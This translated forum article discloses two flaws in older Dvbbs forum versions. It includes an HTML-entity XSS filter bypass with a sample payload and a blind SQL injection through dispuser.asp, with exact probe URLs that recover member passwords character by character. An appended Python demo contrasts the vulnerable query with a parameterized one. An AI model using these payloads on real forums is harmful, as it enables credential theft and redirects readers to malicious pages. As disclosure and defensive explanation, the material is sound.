As an excellent ASP forum in China, the Dvbbs (Mobile Network) forum is well loved by webmasters and netizens alike, but since it is a program written by people, it cannot be perfect. Here I have to talk about two vulnerabilities that are currently making the rounds.
(Great, say it quickly! I'm off to find the forum that deleted my post... faint. Don't take this the wrong way.)
The article follows.
1. This vulnerability is not too serious. Anyone who uses the Dvbbs forum knows that when you post, JavaScript written directly is filtered out, and anything starting with http is automatically turned into a link. The vulnerability lies in exactly these two places: replace one or two letters with their HTML entity form, the system then decodes the entity back into the letter, and the filter is bypassed. As an example, write `[IMG]javas&#x63;ript:window.open('htt&#x70;://www.5dmedia.com','')[/img]`. It is clear that `&#x63;` decodes to the letter "c" and `&#x70;` decodes to "p", so the link is rendered; wrapping it in [IMG] is what triggers the JS. If the forum supports inserting Flash, [SWF] works as well. With this vulnerability one can play some pranks: write a tempting subject line, and the result is that readers land on somebody's home page (advertising), or worse, on a web page carrying viruses or Trojans. This vulnerability exists in all versions of the Dvbbs forum, including the new 0519 version, so its coverage is very wide. In my personal opinion, the illegal characters should be detected rather than handled so simplistically, and I really hope the Dvbbs developers fix this loophole soon.
2. Compared to the first one, the second vulnerability is a much bigger problem: with it the password of every registered member of the forum can be cracked (horror~~~). Because the forum administrator usually just drops the forum program in place and uses it as is, that convenience is exactly what leads to the vulnerability, and we can put it back the same way. Just look at the forum's database and you know that the password field is UserPassword. Next, to crack the password of a user called ABC, for example, first look at ABC's user information. The link given is http://xxxxx/dispuser.asp?name=ABC. In dispuser.asp the statement that reads the parameter is `username = trim(Request("name"))`, and the database query statement is `SQL = "Select * from [user] where username = '" & username & "'"`. As you can see, ABC is passed straight into dispuser as the parameter username. In addition, if the user does not exist, the program shows a prompt saying so. Given this, we could append a condition on the password after `where username = 'ABC'`, namely `and userpassword = "******"`, which in theory would crack the password, but that would take a year. So now I turn to VBS functions: with the LEN function I can try the number of characters in the password. Enter `http://xxxxx/dispuser.asp?name=ABC'%20and%20LEN(UserPassword)=5%20AND%20'1'='1`. This may not be obvious, but placed into the SQL statement it is actually this: `SQL = "Select * from [user] where username = 'ABC' and LEN(userpassword) = 5 and '1' = '1'"`. Now it is clear: %20 is a space, and the single quote after ABC together with the single quote in `'1'='1` are there to make the SQL statement match up. Strange, it says the user does not exist? That means no user meets this condition, so carry on and replace 5 with 6, 7, 8 and so on; as soon as the user information is displayed, the number of characters in the password is known. What to do next is try each character of the password, still using VBS, with the Left, Right or Mid functions: `http://xxxxx/dispuser.asp?name=ABC'%20and%20LEFT(userpassword,1)='a`. Guess right and the user information is shown; guess wrong and you get the prompt that this user does not exist. That is too slow, so add the ASC function on top: `http://xxxxx/dispuser.asp?name=abc'%20and%20ASC(MID(Userpassword,1,1))>'50` tests whether the ASCII code of a character of the user's password is greater than 50, and by constantly narrowing the range I believe the range can soon be reduced to a single value. Did that give you a cold sweat? For me at least, relying on a few functions used flexibly, a conservative estimate is that a password can be cracked in under half an hour. Fortunately, the developers switched to MD5 encryption after the 05** version, which is finally reliable, but there are still many sites in China running older versions of the Dvbbs forum (including a fairly well-known Flash site), so I still need to explain it here, as a warning.
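The concatenation pattern from dispuser.asp beside its bound-parameter form, as an added example that is not code from the article or from the Dvbbs project: an in-memory SQLite table stands in for the forum's [user] table (column names from the article, rows and the LEN emulation are constructed), and the article's length probe is run against both lookups so the difference in behaviour is visible.

```python
import sqlite3

# Constructed stand-in for the forum's [user] table (column names from the
# article, rows made up). LEN is registered so the article's Jet-style
# condition runs unchanged on SQLite.
def make_db():
    con = sqlite3.connect(":memory:")
    con.create_function("LEN", 1, lambda s: None if s is None else len(s))
    con.execute("CREATE TABLE user (username TEXT, userpassword TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?)",
                    [("ABC", "s3cret"), ("bob", "hunter2")])
    return con

def lookup_vulnerable(con, name):
    # Same shape as the dispuser.asp statement: the trimmed name is spliced
    # into the SQL text, so a quote inside it becomes part of the query.
    sql = "SELECT username FROM user WHERE username = '" + name.strip() + "'"
    return [row[0] for row in con.execute(sql)]

def lookup_hardened(con, name):
    # Bound parameter: the value travels outside the SQL text and is only
    # ever compared as a literal username, quotes and all.
    sql = "SELECT username FROM user WHERE username = ?"
    return [row[0] for row in con.execute(sql, (name.strip(),))]

def probe(length):
    # The article's length-probing name value with %20 decoded to spaces.
    return "ABC' and LEN(userpassword) = %d and '1' = '1" % length

def demo():
    con = make_db()
    return {
        "vuln_plain": lookup_vulnerable(con, "ABC"),          # ['ABC']
        "vuln_probe_wrong": lookup_vulnerable(con, probe(5)), # [] -> "user does not exist"
        "vuln_probe_right": lookup_vulnerable(con, probe(6)), # ['ABC'] -> length leaks
        "hard_plain": lookup_hardened(con, "ABC"),            # ['ABC']
        "hard_probe": lookup_hardened(con, probe(6)),         # [] -> probe is just a username
    }

if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

With the bound parameter the "user does not exist" prompt no longer answers a question about the password, which is what turns the prompt into an oracle in the vulnerable form.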
Postscript: I was very hesitant while writing this article, because I don't know whether it will fall into the wrong hands. Here is my advice: any disruption of a forum's order, or illegally stealing other people's passwords, is extremely immoral. Please restrain yourselves!